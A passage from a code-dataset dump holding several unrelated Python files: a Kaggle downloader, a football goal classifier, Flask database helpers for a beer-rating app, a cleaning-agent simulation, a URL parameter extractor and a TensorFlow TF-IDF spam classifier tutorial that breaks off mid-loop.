`load_via_kaggle` performs the authentication and download steps.\n\nThis script can be run directly, and upon execution, it will download and unzip the specified dataset to the\ndestination path.\n\nDependencies:\n    - Kaggle SDK\n    - os module\n\nUsage:\n    python load_data.py\n\n\"\"\"\nimport os\nfrom kaggle import KaggleApi\n\nscript_folder = os.path.dirname(os.path.abspath(__file__))\ndestination_path = os.path.join(script_folder, \"data\")\ndataset_name = 'amitanshjoshi/spotify-1million-tracks'\n\n\ndef load_via_kaggle():\n    # Authenticating with the Kaggle API\n    api = KaggleApi()\n    api.authenticate()\n\n    # Downloading the dataset\n    api.dataset_download_files(dataset_name, path=destination_path, unzip=True)\n\n\nif __name__ == \"__main__\":\n    load_via_kaggle()\n","repo_name":"aai-institute/beyond-jupyter-spotify-popularity","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"43102133170","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jul 20 20:59:18 2019\r\n\r\n@author: Sadanand Vishwas\r\n\"\"\"\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndata = pd.read_csv('data/data.csv')\r\ndata.drop(['Unnamed: 0'], axis=1, inplace=True)\r\n# 'match_id', 'team_id'\r\ndata.describe()\r\ndata.apply(lambda x:sum(x.isnull()))\r\ndata.apply(lambda x:len(x.unique()))\r\ndata['shot_id_number'] = data.index+1\r\n\r\ndata.fillna({'remaining_min':data['remaining_min'].mean(),\r\n             'power_of_shot':data['power_of_shot'].mean(),\r\n             'remaining_sec':data['remaining_sec'].mean(),\r\n             'distance_of_shot':data['distance_of_shot'].mean(),\r\n             'location_x':data['location_x'].mean(),\r\n             'location_y':data['location_y'].mean(),\r\n             'remaining_min.1':data['remaining_min.1'].mean(),\r\n             'power_of_shot.1':data['power_of_shot.1'].mean(),\r\n             'remaining_sec.1':data['remaining_sec.1'].mean(),\r\n             'distance_of_shot.1':data['distance_of_shot.1'].mean(),\r\n             'knockout_match.1':data['knockout_match.1'].mean()},inplace=True)\r\n\r\nvars=['knockout_match','area_of_shot','shot_basics', 'range_of_shot', 'team_name',\r\n       'date_of_game', 'home/away', 
'type_of_shot', 'type_of_combined_shot',\r\n       'lat/lng', 'game_season']\r\n\r\nfor var in vars:\r\n    data[var].fillna(method='ffill', inplace=True)\r\n    \r\ndata['type_of_combined_shot'].fillna(method='bfill', inplace=True)\r\n\r\ndata['home_or_away'] = data['home/away'].apply(lambda x:\r\n                    'AWA' if x[5:6] == '@' else 'HOM')\r\n    \r\ndata['time_min.1'] = data['remaining_min.1'] + data['remaining_sec.1'].apply(lambda x:\r\n                    x if x==0 else x/60)\r\n    \r\ntimes = [i for i in range(2, 131, 2)]\r\nstart_time = [i for i in range(0, 129, 2)]\r\ndef imputeTime(cols):\r\n    time = cols[0]\r\n    for i,time_i in enumerate(times):\r\n        if float(time)<=float(time_i):\r\n            return str(start_time[i])+'-'+str(time_i)\r\n\r\n\r\ndata['remaining_time'] = data[['time_min.1']].apply(imputeTime, axis=1).astype(str)\r\n\r\ndata.drop(['time_min.1','location_y', 'shot_basics', 'lat/lng','power_of_shot.1','distance_of_shot.1',\r\n           'knockout_match.1','distance_of_shot.1', 'range_of_shot', 'type_of_shot',\r\n           'match_event_id', 'team_name', 'team_id', 'match_id', 'date_of_game',\r\n           'home/away', 'remaining_min', 'remaining_min.1', 'remaining_sec',\r\n           'remaining_sec.1'],\r\n           axis=1,inplace=True)\r\n\r\ndata.apply(lambda x:sum(x.isnull()))\r\ndata.apply(lambda x:len(x.unique()))\r\n\r\n# Create broad seasons of 4 years each\r\nseasons = ['2000','2004', '2008','2012','2016']\r\nstart_seasons = ['1996','2001','2005', '2009', '2013']\r\ndef imputSeason(cols):\r\n    season=cols[0]\r\n    for i,year in enumerate(seasons):\r\n        if year>=season[:4]:\r\n            return start_seasons[i]+'-'+year[-2:]\r\n\r\ndata['game_season_broad'] = data[['game_season']].apply(imputSeason, axis=1).astype(str)\r\ndata.drop(['game_season'],axis=1, inplace=True)\r\n\r\n# Label Encoding \r\nfrom sklearn.preprocessing import LabelEncoder\r\nle = LabelEncoder()\r\n\r\nvars = ['area_of_shot', 'home_or_away',\r\n        'type_of_combined_shot',\r\n        'game_season_broad', 'remaining_time']\r\n\r\nfor var in vars:\r\n    data[var]=le.fit_transform(data[var])\r\n\r\n# Correlation table (matrix)\r\ncor = data.corr( method='pearson')\r\n\r\n# OneHotEncoding\r\ndata=pd.get_dummies(data, columns=vars)\r\n\r\n# Save modified data\r\ndata.to_csv(\"modified_data.csv\", index=False)\r\n# Read dataset\r\ndata_all = pd.read_csv(\"modified_data.csv\")\r\n\r\ndata_fr = data_all.dropna(axis=0, inplace=False)\r\ndata_nan = data_all[data.isnull().any(axis=1)]\r\ndata_nan.drop(['is_goal'], axis=1, inplace=True)\r\n# Split the variables\r\ny = data_fr['is_goal'].to_numpy()\r\nX = (data_fr.drop(['is_goal', 'shot_id_number'], axis=1,\r\n                  inplace=False)).iloc[:,:]\r\n\r\n# Split the Train Test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\r\n\r\n# Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc = StandardScaler()\r\nX_train_scaled = sc.fit_transform(X_train)\r\nX_test_scaled = sc.transform(X_test)\r\n\r\ndef modelClassification(X_trainset, X_testset, y_trainset, y_testset,\r\n                 classifier, name):\r\n    # Fitting the model to classifier\r\n    classifier.fit(X_trainset, y_trainset)\r\n    \r\n    # Predicting the Results\r\n    y_pred = classifier.predict(X_testset)\r\n\r\n    # Evaluating on the test set\r\n    from sklearn.metrics import confusion_matrix, accuracy_score, mean_absolute_error\r\n    cm = confusion_matrix(y_testset, y_pred)\r\n    print(cm)\r\n    print(\"Accuracy of \"+name+\" is :\",accuracy_score(y_testset, y_pred))\r\n    print(\"MAE of \"+name+\" is :\",mean_absolute_error(y_testset, y_pred))\r\n    # for the actual dataset\r\n    X_nan = (data_nan.drop(['shot_id_number'], axis=1,\r\n                  inplace=False)).iloc[:,:]\r\n    \r\n    y_nan_pred = classifier.predict(X_nan)\r\n    result_df = 
pd.DataFrame({'shot_id_number':data_nan['shot_id_number'],\r\n                'is_goal':y_nan_pred},\r\n                 columns=['shot_id_number','is_goal'])\r\n    result_df.to_csv(\"results/\"+name+\"_classifier_prediction_1.csv\", index=False)\r\n\r\n\r\n\r\n# Fitting Logistic Regression to the Training set\r\nfrom sklearn.linear_model import LogisticRegression\r\nclassifier = LogisticRegression(n_jobs=-1)\r\n\r\nmodelClassification(X_train_scaled, X_test_scaled, y_train, y_test, classifier,\r\n                    name=\"logistic_regression\")\r\n\r\n# Fitting KNN to the Training set\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nclassifier = KNeighborsClassifier(n_neighbors=20, n_jobs=-1)\r\n\r\nmodelClassification(X_train_scaled, X_test_scaled, y_train, y_test, classifier, name=\"knn\")\r\n\r\n# =============================================================================\r\n# # Fitting SVM to the Training set\r\n# from sklearn.svm import SVC\r\n# classifier=SVC(kernel='rbf',probability=True, class_weight='balanced')\r\n# \r\n# model_train(X_train_scaled, X_test_scaled, y_train, y_test, classifier, name=\"svm\")\r\n# \r\n# =============================================================================\r\n\r\n# Fitting Decision Tree Classification to the Training set\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nclassifier = DecisionTreeClassifier(max_depth=8, criterion = 'entropy',min_samples_leaf=20)\r\n\r\nmodelClassification(X_train_scaled, X_test_scaled, y_train, y_test, classifier, name=\"decision_tree\")\r\n\r\n\r\n# Fitting Random Forest Classification to the Training set\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nclassifier = RandomForestClassifier(n_estimators = 110, max_depth = 10, \r\n                                    criterion = 'entropy',min_samples_leaf=25,\r\n                                    n_jobs=-1)\r\nmodelClassification(X_train_scaled, X_test_scaled, y_train,\r\n                    y_test, classifier, name=\"random_forest\")\r\n\r\n\r\nprint(\"The model ran and executed successfully.\")","repo_name":"saddhu1005/Is-It-A-Goal","sub_path":"submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":6807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"18751147693","text":"import datetime\nimport json\nimport math\nimport os\nimport secrets\nfrom os import path\nimport traceback\nfrom PIL import Image\n\nfrom flask import current_app as app\nimport csv\nfrom pydub import AudioSegment\nfrom pydub.utils import mediainfo\nimport pathlib\nfrom werkzeug import secure_filename\nfrom collections import defaultdict\nfrom flask import flash\nfrom sqlalchemy import func\nfrom flask_security import current_user\nfrom skal.models import (User, db, Beer, BeerRating, BeerComment, Beernight,\n                         BeernightRating, CommentLike, CommentReport,\n                         BeernightBeer, BeernightbeerComment, BeernightbeerRating,\n                         BeernightInvitation)\n\n\ndef resolve_order(object, sort_by, order='desc'):\n    ordering = getattr(object, sort_by)\n    if callable(ordering):\n        ordering = ordering()\n    if str(order) == 'asc':\n        return ordering.asc()\n    else:\n        return ordering.desc()\n\n\ndef save_picture(form_picture):\n    random_hex = secrets.token_hex(8)\n    _, f_ext = os.path.splitext(form_picture.filename)\n    picture_fn = random_hex + f_ext\n    picture_path = os.path.join(app.config['BEERS_IMAGE_DIR'], picture_fn)\n    output_size = (612, 612)\n    i = Image.open(form_picture)\n    i.thumbnail(output_size)\n    i.save(picture_path)\n    return picture_fn\n\ndef make_beer(form, image):\n    try:\n        beer = Beer()\n        form.populate_obj(beer)\n        beer.book_score = beer.calculateBook\n        db.session.add(beer)\n        db.session.commit()\n        if 
beer:\n picture_file = save_picture(image)\n if picture_file:\n if beer.image_path:\n if path.exists(os.path.join(app.config['BEERS_IMAGE_DIR'], beer.image_path)):\n os.remove(os.path.join(app.config['BEERS_IMAGE_DIR'], beer.image_path))\n beer.image_path = picture_file\n db.session.commit()\n return beer\n except Exception as e:\n print(e)\n return False\n\ndef delete_beer_rating_if_exists(beer_id, user_id):\n rating = BeerRating.query\\\n .filter(BeerRating.beer_id == beer_id) \\\n .filter(BeerRating.user_id == user_id).all()\n exists = False\n for r in rating:\n exists = True\n db.session.delete(r)\n db.session.commit()\n return exists\n\n\ndef add_beer_rating(user_id, beer, rating):\n try:\n delete_beer_rating_if_exists(beer.id, user_id)\n if(rating != 0): \n beer_rating = BeerRating(user_id, beer, rating)\n db.session.add(beer_rating)\n db.session.commit()\n return beer_rating\n return True\n except Exception as e:\n print(e)\n return False\n\ndef check_cat_input(cat):\n return cat in ['rating', 'taste', 'smell', 'feel', 'sight']\n\ndef add_beernight_beer_rating(user_id, beer, grade, category):\n if not check_cat_input(category):\n return False\n\n try:\n rating = BeernightbeerRating.query\\\n .filter(BeernightbeerRating.beer_id == beer.id) \\\n .filter(BeernightbeerRating.user_id == user_id).first()\n if rating:\n if(grade == 0):\n setattr(rating, category, None)\n else:\n setattr(rating, category, grade)\n \n else:\n rating = BeernightbeerRating(user_id, beer)\n setattr(rating, category, grade)\n db.session.add(rating)\n db.session.commit()\n return rating\n\n except Exception as e:\n print(e)\n return False\n\ndef add_beer_comment(user_id, beer, text, parent_id=None):\n try:\n if(text and beer): \n beer_comment = BeerComment(user_id, beer, text, parent_id)\n db.session.add(beer_comment)\n db.session.commit()\n return beer_comment\n return True\n except Exception as e:\n print(e)\n return False\n\ndef delete_favourite_if_exists(beer_id, user):\n beers = user.beers\n favs = []\n for b in beers:\n if b.id == beer_id:\n favs.append(b)\n if favs:\n for f in favs:\n user.beers.remove(f)\n db.session.commit()\n return True\n return False\n\n\ndef add_beer_favourite(user, beer, fav):\n user_id = user.id\n try:\n delete = delete_favourite_if_exists(beer.id, user)\n if not delete:\n user.beers.append(beer)\n db.session.commit()\n return True\n return False\n except Exception as e:\n print(e)\n return False\n\ndef delete_beernight_rating_if_exists(beernight_id, user_id):\n rating = BeernightRating.query\\\n .filter(BeernightRating.beernight_id == beernight_id) \\\n .filter(BeernightRating.user_id == user_id).all()\n exists = False\n for r in rating:\n exists = True\n db.session.delete(r)\n db.session.commit()\n return exists\n\ndef add_beernight_rating(user_id, beernight, rating):\n try:\n delete_beernight_rating_if_exists(beernight.id, user_id)\n if(rating != 0): \n beernight_rating = BeernightRating(user_id, beernight.id, rating)\n db.session.add(beernight_rating)\n db.session.commit()\n return beernight_rating\n return True\n except Exception as e:\n print(e)\n return False\n\ndef make_beernight(form, beer, user):\n try:\n beernight = Beernight()\n form.populate_obj(beernight)\n beernight.creator_id = user.id\n beernight.admins.append(user)\n beernight.members.append(user)\n if beer:\n beernightBeer = BeernightBeer(beer)\n db.session.add(beernightBeer)\n db.session.flush()\n beernight.beers.append(beernightBeer)\n db.session.add(beernight)\n db.session.commit()\n 
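        # give the new beernight its own data directory under the creator's beernights path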
os.mkdir(os.path.join(user.user_beernights_path, str(beernight.id)))\n return beernight\n except Exception as e:\n print(e)\n return None\n\n\ndef save_beernight_beer_picture(form_picture, beer):\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(form_picture.filename)\n picture_fn = random_hex + f_ext\n picture_path = os.path.join(beer.data_path, picture_fn)\n output_size = (612, 612)\n i = Image.open(form_picture)\n i.thumbnail(output_size)\n i.save(picture_path)\n return picture_fn\n\n\ndef make_beernightbeer(form, beernight_id, image):\n try:\n beernight = Beernight.query.get(beernight_id)\n beer = BeernightBeer()\n form.populate_obj(beer)\n beer.is_custom_made = True\n db.session.add(beer)\n db.session.flush()\n beernight.beers.append(beer)\n db.session.commit()\n if beer:\n if image:\n picture_file = save_beernight_beer_picture(image, beer)\n if picture_file:\n if beer.image_path:\n if path.exists(os.path.join(beer.data_path, beer.image_path)):\n os.remove(os.path.join(beer.data_path, beer.image_path))\n beer.image_path = picture_file\n db.session.commit()\n return beer\n except Exception as e:\n print(e)\n return False\n\ndef make_member_admin(beernight_id, member_id):\n try:\n beernight = Beernight.query.get(beernight_id)\n member = User.query.get(member_id)\n beernight.admins.append(member)\n db.session.commit()\n return beernight\n except Exception as e:\n print(e)\n return None\n\ndef remove_member_from_beernight(beernight_id, member_id):\n try:\n beernight = Beernight.query.get(beernight_id)\n member = User.query.get(member_id)\n beernight.members.remove(member)\n db.session.commit()\n return beernight\n except Exception as e:\n print(e)\n return None\n\ndef send_beernight_invitation_db(user, beernight_id):\n beernight = Beernight.query.get(beernight_id)\n invite = BeernightInvitation.query \\\n .filter(BeernightInvitation.beernight_id == beernight_id) \\\n .filter(BeernightInvitation.receiver_id == user.id).first()\n if invite or beernight.is_user_in_beernight(user.id):\n return {'error':'User already has an invitation or is already in the tasting'}\n try:\n invite = BeernightInvitation(user.id, current_user.id, beernight_id)\n db.session.add(invite)\n db.session.commit()\n return {'invite':invite}\n except Exception as e:\n print(e)\n return {'error':'Something went wrong'}\n\ndef delete_beernight_invitation_db(beernight_invitation_id):\n try:\n invite = BeernightInvitation.query.get(beernight_invitation_id)\n if invite.beernight.is_user_admin(current_user.id) or current_user.id == invite.receiver_id:\n db.session.delete(invite)\n db.session.commit()\n return True\n return False\n except Exception as e:\n print(e)\n return None\n\ndef accept_beernight_invitation_db(beernight_invitation_id):\n try:\n invite = BeernightInvitation.query.get(beernight_invitation_id)\n if invite.receiver_id == current_user.id:\n beernight = Beernight.query.get(invite.beernight_id)\n beernight.members.append(current_user)\n delete_beernight_invitation_db(beernight_invitation_id)\n db.session.commit()\n return True\n return False\n except Exception as e:\n print(e)\n return None\n\ndef make_member_beernight_admin(beernight_id, member_id):\n try:\n beernight = Beernight.query.get(beernight_id)\n member = User.query.get(member_id)\n if not beernight.is_user_admin(member_id) and beernight.is_user_member(member_id):\n beernight.admins.append(member)\n db.session.commit()\n return True\n return False\n except Exception as e:\n print(e)\n return None\n\n\ndef copy_public_beernight(form, beernight_id):\n 
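# Clones a public (or admin-owned) beernight for the current user: the beer\n # list is copied via each entry's orginal_beer and the source's copy_count is\n # incremented, mirroring make_beernight above.\n 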
try:\n old_beernight = Beernight.query.get(beernight_id)\n if old_beernight.is_public or old_beernight.is_user_admin(current_user.id):\n user = User.query.get(current_user.id)\n beernight = Beernight()\n form.populate_obj(beernight)\n beernight.admins.append(user)\n beernight.members.append(user)\n beernight.creator_id = current_user.id\n beernight.category = old_beernight.category\n for b in old_beernight.beers:\n beernightBeer = BeernightBeer(b.orginal_beer)\n db.session.add(beernightBeer)\n db.session.flush()\n beernight.beers.append(beernightBeer)\n if not old_beernight.copy_count:\n old_beernight.copy_count = 1\n else:\n old_beernight.copy_count += 1\n db.session.add(beernight)\n db.session.commit()\n os.mkdir(os.path.join(current_user.user_beernights_path, str(beernight.id)))\n return beernight\n return False\n except Exception as e:\n print(e)\n return None\n\ndef delete_beer_from_beernight_db(beer_id):\n try:\n beer = BeernightBeer.query.get(beer_id)\n db.session.delete(beer)\n db.session.commit()\n return True\n except Exception as e:\n print(e)\n return None\n\ndef add_beer_to_beernight_db(beer_id, beernight_id):\n try:\n beernight = Beernight.query.get(beernight_id)\n beer = Beer.query.get(beer_id)\n beernightBeer = BeernightBeer(beer)\n db.session.add(beernightBeer)\n db.session.flush()\n beernight.beers.append(beernightBeer)\n db.session.commit()\n return beernight\n except Exception as e:\n print(e)\n return None\n\ndef report_comment_db(comment_id, user_id):\n try:\n report = CommentReport.query\\\n .filter(CommentReport.comment_id == comment_id) \\\n .filter(CommentReport.user_id == user_id).all()\n if not report:\n report = CommentReport(user_id, comment_id)\n db.session.add(report)\n db.session.commit()\n return True\n return report\n except Exception as e:\n print(e)\n return False\n\ndef like_dislike_comment_db(comment_id, user_id):\n try:\n like = CommentLike.query\\\n .filter(CommentLike.comment_id == comment_id) \\\n .filter(CommentLike.user_id == user_id).all()\n if not like:\n like = CommentLike(user_id, comment_id)\n db.session.add(like)\n db.session.commit()\n return 'like'\n else: \n for i in like:\n db.session.delete(i)\n db.session.commit()\n return 'dislike'\n except Exception as e:\n print(e)\n return False\n\ndef delete_user_db(user):\n beernight_ratings = user.get_beernight_ratings\n beer_ratings = user.get_beer_ratings\n beer_beernight_beer_ratings = user.get_beernight_beer_ratings\n beer_comments = user.get_beer_comments\n beernights = user.get_beernights\n cats = [beernights, beernight_ratings, beer_ratings, beer_beernight_beer_ratings, beer_comments]\n for i in cats:\n for j in i:\n db.session.delete(j)\n db.session.commit()\n db.session.delete(user)\n db.session.commit()","repo_name":"StefanGunnlaugur/Beer-flask","sub_path":"skal/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":13323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"73770606044","text":"from helpers import *\nimport numpy as np\n\nclass Agent:\n def __init__(self):\n self.carry = None\n\n def see(self, env):\n pass\n\n def action(self, env):\n if env.env[self.x][self.y].is_dirty:\n env.env[self.x][self.y].dirty = False\n env.dirty -= 1\n elif isinstance(env.env[self.x][self.y].obj, Corral) and self.carry:\n env.env[self.x][self.y].obj.kid = self.carry\n self.carry = None\n else:\n if self.looked is None:\n return\n\n step = 1 + bool(self.carry)\n\n while step:\n if str(self.looked) == \"k\":\n nx, ny = 
self.compute_next_move((self.looked.x, self.looked.y), env)\n env.move_agent(nx, ny)\n if str(env.env[self.x][self.y].obj) == \"k\":\n self.carry = env.env[self.x][self.y].obj\n env.env[self.x][self.y].obj = None\n env.remove_kid(self.carry)\n else:\n nx, ny = self.compute_next_move((self.looked.x, self.looked.y), env, obs=[\"O\", \"C\", \"k\"])\n env.move_agent(nx, ny)\n step -= 1\n\n def next(self, env):\n self.see(env)\n self.action(env)\n\n def compute_next_move(self, pos, env, obs=[\"O\", \"C\"]):\n x, y = pos\n dx = np.sign(x - self.x)\n dy = np.sign(y - self.y)\n \n if str(env.env[self.x + dx][self.y + dy]) in obs:\n if str(env.env[self.x + dx][self.y + dy]) == \"C\" and not env.env[self.x + dx][self.y + dy].obj.with_kid:\n pass\n else:\n try:\n return rnd_choice(env.map_adj((self.x, self.y)), pred=lambda z: env.env[z[0]][z[1]].obj == None)\n except:\n return self.x, self.y\n\n return self.x + dx, self.y + dy\n\n def __str__(self):\n return \"A\"\n\nclass Reactive(Agent):\n def __init__(self):\n super().__init__()\n self.looked = None\n\n def see(self, env):\n pos = (self.x, self.y)\n if not self.carry and len(env.kids):\n self.looked = near_obj(pos, env, [\"k\"])\n else:\n self.looked = near_obj(pos, env, [\"C\", \"X\"])\n\n @property\n def name(self):\n return \"Reactive\"\n\n def __str__(self):\n return \"R\" if not self.carry else \"r\"\n\nclass Proactive(Agent):\n def __init__(self):\n super().__init__()\n self.looked = None\n\n def see(self, env):\n pos = (self.x, self.y)\n dp = env.garbage_pc()\n if not self.carry and len(env.kids):\n self.looked = near_obj(pos, env, [\"k\"])\n elif self.carry:\n self.looked = near_obj(pos, env, [\"C\"])\n else:\n self.looked = near_obj(pos, env, [\"X\"])\n\n @property\n def name(self):\n return \"Proactive\"\n\n def __str__(self):\n return \"P\" if not self.carry else \"p\"\n\ndef near_obj(pos, env, search): \n queue = [pos]\n mark = [ [ False for _ in range(len(env.env[0]))] for _ in range(len(env.env)) ]\n obj = None\n while queue:\n x, y = queue.pop(0)\n if mark[x][y]:\n continue\n mark[x][y] = True\n if str(env.env[x][y]) in search:\n if str(env.env[x][y]) == \"C\" and env.env[x][y].obj.with_kid:\n pass \n else:\n obj = env.env[x][y]\n break\n for ax, ay in env.directions(x, y):\n if not mark[ax][ay]:\n queue.append((ax, ay))\n return obj","repo_name":"hros18/proyecto-3-simulacion","sub_path":"src/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"38780363091","text":"import re\n\nclass ExtratorUrl:\n def __init__(self, url):\n self.url = self.sanitiza_url(url)\n self.valida_url()\n\n def sanitiza_url(self,url):\n if type(url) == str:\n return url.strip()\n else:\n return \"\"\n \n def valida_url(self):\n if not self.url:\n raise ValueError(\"The URL is empty...\")\n padrao_url = re.compile(\"(http(s)?://)?(www.)?bytebank.com(.br)?/cambio\")\n valida = padrao_url.match(self.get_url_base())\n if not valida:\n raise ValueError(\"The address {} is not a valid URL for this operation.\".format(self.get_url_base()))\n\n def get_url_base(self):\n indice_interrogacao = self.url.find('?')\n if indice_interrogacao > 0:\n url_base = self.url[0:indice_interrogacao] \n else:\n url_base = self.url\n return url_base\n\n def get_url_parametros(self):\n indice_interrogacao = self.url.find('?')\n url_paramentros = self.url[indice_interrogacao+1:]\n return url_paramentros\n\n def get_valor_parametro(self, 
parametro_busca):\n indice_parametro = self.get_url_parametros().find(parametro_busca)\n indice_valor = indice_parametro + len(parametro_busca) + 1\n indice_e_comercial = self.get_url_parametros().find('&', indice_valor)\n if indice_e_comercial == -1:\n valor = self.get_url_parametros()[indice_valor:]\n else:\n valor = self.get_url_parametros()[indice_valor:indice_e_comercial]\n return valor\n\n def __len__(self):\n return len(self.url)\n \n def __str__(self):\n return \"URL: \" + self.url + \"\\nURL base: \" + self.get_url_base() + \"\\nParameters: \" + self.get_url_parametros()\n \n def __eq__(self, other) :\n return self.url == other.url\n\nextrator_url = ExtratorUrl(\"https://bytebank.com/cambio?moedaDestino=dolar&quantidade=100&moedaOrigem=real\")\n#extrator_url = ExtratorUrl(\"\")\n\nprint(\"The URL is {} characters long.\".format(len(extrator_url)))\nprint(extrator_url)\nparametro_quantidade = extrator_url.get_valor_parametro(\"quantidade\")\nparametro_moeda_origem = extrator_url.get_valor_parametro(\"moedaOrigem\")\nparametro_moeda_destino = extrator_url.get_valor_parametro(\"moedaDestino\")\n\ndolar = 5.25\n\nif parametro_moeda_origem == \"real\" and parametro_moeda_destino == \"dolar\":\n conversao = float(parametro_quantidade)/ dolar\n simbolo = \"USD\"\nelif parametro_moeda_origem == \"dolar\" and parametro_moeda_destino == \"real\":\n conversao = float(parametro_quantidade) * dolar\n simbolo = \"R$\"\n\nprint(parametro_quantidade)\nprint(parametro_moeda_origem)\nprint(parametro_moeda_destino)\nprint(\"The conversion result is {} {}\".format(simbolo,round(conversao,2)))","repo_name":"LuisSousa-MB/Python-way","sub_path":"Alura/manipulando_strings/extrator_url.py","file_name":"extrator_url.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"38823798577","text":"#!/usr/bin/python2.7\n# -*- coding:utf-8 -*-\n\n# Author: NetworkRanger\n# Date: 2018/12/10 9:30 PM\n\n# 7.3 Implementing the TF-IDF algorithm with TensorFlow\n\n# 1. Import the required libraries. This example uses scikit-learn's TF-IDF module to process the text dataset\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport csv\nimport numpy as np\nimport os\nimport string\nimport requests\nimport io\nimport nltk\nfrom zipfile import ZipFile\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n# 2. Create a graph session and declare the batch size and the maximum vocabulary size\nsess = tf.Session()\nbatch_size = 200\nmax_features = 1000\n\n# 3. Load the text dataset, either downloading it from the website or reading the copy saved in the temp folder\nsave_file_name = os.path.join('temp', 'temp_spam_data.csv')\nif os.path.isfile(save_file_name):\n text_data = []\n with open(save_file_name, 'r') as temp_output_file:\n reader = csv.reader(temp_output_file)\n for row in reader:\n text_data.append(row)\nelse:\n zip_url = 'http://archive.ics.uci.edu/ml/machine-learning-databases/00228/smsspamcollection.zip'\n r = requests.get(zip_url)\n z = ZipFile(io.BytesIO(r.content))\n file = z.read('SMSSpamCollection')\n # Format Data\n text_data = file.decode()\n text_data = text_data.encode('ascii', errors='ignore')\n text_data = text_data.decode().split('\\n')\n text_data = [x.split('\\t') for x in text_data if len(x) >= 1]\n\n # And write to csv\n with open(save_file_name, 'w') as temp_output_file:\n writer = csv.writer(temp_output_file)\n writer.writerows(text_data)\n\ntexts = [x[1] for x in text_data]\ntarget = [x[0] for x in text_data]\n# Relabel 'spam' as 1, 'ham' as 0\ntarget = [1 if x == 'spam' else 0 for x in target]\n\n# 4. Declare the vocabulary size. This example also converts all text to lower case and strips punctuation and digits\n
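# e.g. 'Call 0800-FREE now!!' becomes 'call free now' after the four steps below\n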
# Lower case\ntexts = [x.lower() for x in texts]\n# Remove punctuation\ntexts = [''.join(c for c in x if c not in string.punctuation) for x in texts]\n# Remove numbers\ntexts = [''.join(c for c in x if c not in '0123456789') for x in texts]\n# Trim extra whitespace\ntexts = [' '.join(x.split()) for x in texts]\n\n# 5. To use scikit-learn's TF-IDF vectorizer we need to feed in tokenized sentences (i.e. each sentence split into its words). The nltk package provides an excellent tokenizer for this\ndef tokenizer(text):\n words = nltk.word_tokenize(text)\n return words\n# Create TF-IDF of texts\ntfidf = TfidfVectorizer(tokenizer=tokenizer, stop_words='english', max_features=max_features)\nsparse_tfidf_texts = tfidf.fit_transform(texts)\n\n# 6. Split the dataset into training and test sets\ntrain_indices = np.random.choice(sparse_tfidf_texts.shape[0], round(0.8*sparse_tfidf_texts.shape[0]), replace=False)\ntest_indices = np.array(list(set(range(sparse_tfidf_texts.shape[0])) - set(train_indices)))\ntexts_train = sparse_tfidf_texts[train_indices]\ntexts_test = sparse_tfidf_texts[test_indices]\ntarget_train = np.array([x for ix, x in enumerate(target) if ix in train_indices])\ntarget_test = np.array([x for ix, x in enumerate(target) if ix in test_indices])\n\n# 7. Declare the variables of the logistic regression model and the placeholders for the dataset\nA = tf.Variable(tf.random_normal(shape=[max_features, 1]))\nb = tf.Variable(tf.random_normal(shape=[1,1]))\n# Initialize placeholders\nx_data = tf.placeholder(shape=[None, max_features], dtype=tf.float32)\ny_target = tf.placeholder(shape=[None, 1], dtype=tf.float32)\n\n# 8. Declare the model operations and the loss function. Note that the sigmoid part of logistic regression is applied inside the loss function\nmodel_output = tf.add(tf.matmul(x_data, A), b)\nloss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=y_target, logits=model_output))\n\n# 9. Add prediction and accuracy functions to the graph (so we can watch the train and test accuracy while the model trains)\nprediction = tf.round(tf.sigmoid(model_output))\npredictions_correct = tf.cast(tf.equal(prediction, y_target), tf.float32)\naccuracy = tf.reduce_mean(predictions_correct)\n\n# 10. Declare the optimizer and initialize the variables in the graph\nmy_opt = tf.train.GradientDescentOptimizer(0.0025)\ntrain_step = my_opt.minimize(loss)\n# Initialize Variables\ninit = tf.global_variables_initializer()\nsess.run(init)\n\n# 11. Train the model over 10000 iterations, recording the train and test loss plus the accuracy every 100 iterations, and printing a status line every 500 iterations\ntrain_loss = []\ntest_loss = []\ntrain_acc = []\ntest_acc = []\ni_data = []\nfor i in range(10000):\n rand_index = np.random.choice(texts_train.shape[0], size=batch_size)\n rand_x = texts_train[rand_index].todense()\n rand_y = np.transpose([target_train[rand_index]])\n sess.run(train_step, feed_dict={x_data: rand_x, y_target: rand_y})\n\n # Only record loss and accuracy every 100 generations\n if (i+1)%100 == 0:\n i_data.append(i+1)\n train_loss_temp = sess.run(loss, feed_dict={x_data: rand_x, y_target: rand_y})\n train_loss.append(train_loss_temp)\n\n test_loss_temp = sess.run(loss, feed_dict={x_data: texts_test.todense(), y_target: np.transpose([target_test])})\n test_loss.append(test_loss_temp)\n\n train_acc_temp = sess.run(accuracy, feed_dict={x_data: rand_x, y_target: rand_y})\n train_acc.append(train_acc_temp)\n\n test_acc_temp = sess.run(accuracy, feed_dict={x_data: texts_test.todense(), y_target: np.transpose([target_test])})\n test_acc.append(test_acc_temp)\n\n if (i+1)%500 == 0:\n acc_and_loss = [i+1, train_loss_temp, test_loss_temp, train_acc_temp, test_acc_temp]\n acc_and_loss = [np.round(x,2) for x in acc_and_loss]\n 